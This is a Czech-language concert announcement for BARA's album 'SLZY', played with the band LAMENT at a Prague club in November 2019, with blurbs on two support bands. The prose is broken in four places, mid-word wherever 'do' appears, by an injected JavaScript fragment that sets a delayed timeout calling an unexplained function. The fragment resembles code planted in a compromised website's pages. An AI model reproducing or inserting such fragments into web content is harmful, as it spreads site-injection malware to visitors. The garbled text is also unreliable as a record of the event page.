SLZY LIVE 2019

Datum a čas:
21/11-2019 v 10:00 PM
Místo:
Futurum Music Bar Zborovská 7, Praha 5
Vstupenky:
GoOut
Sdílejte:

 

BARA loni vydala po pěti letech nové album SLZY, které odehraje celé s novou kapelou LAMENT na speciálním koncertě v pražském klubu Futurum 21. listopadu.

Na koncertu zazní i coververze Depeche Mode nebo Davida Bowieho. Studiová novinka reflektuje Bářinu zálibu v melancholické hudbě 80. let, zejména v tvorbě Depeche Mode, Cocteau Twins, Davida Bowieho a The Cure.

Nabízí písně o lásce, vášni, zklamání, rozchodech, manipulaci, samotě, hledání životní cesty i vnímání krás tohoto světa.

O nový repertoár se postarali Richard Ulrych (Nebezpečné známosti) a Luděk Fiala (Decline, p.m. band), kteří album zároveň produkovali.

Texty ke třem skladbám jsou dílem Medy Věžnikové. Koncertní sestavu skupiny LAMENT složenou z obou autorů alba dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doplní bubeník Tomáš Waschinger (p.m. band, exLucie).

V roli předkapel se představí skupiny obou autorů alba SLZY.

NEBEZPEČNÉ ZNÁMOSTI

V hudbě Nebezpečných známostí uslyšíte spleť krásných zvuků kytar a syntezátorů podpořených strojovým tepem rytmiky i velké klenuté refrény zabalené dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do temně-romantického hávu s pocitovými texty. Kapela natočila svůj aktuální singl Gabriela v produkci Laca Lučeniče, legendy československé syntezátorové hudby.

PETR MUK BAND

Kapela, která dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doprovázela Petra Muka na jeho koncertech v čele s Luďkem Fialou, který zazpívá méně známé a temnější songy z Petrova repertoáru.

[event_countdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}down style=“big“ custom_event=“0″ custom_event_id=“4020″ background=“bg–dark“]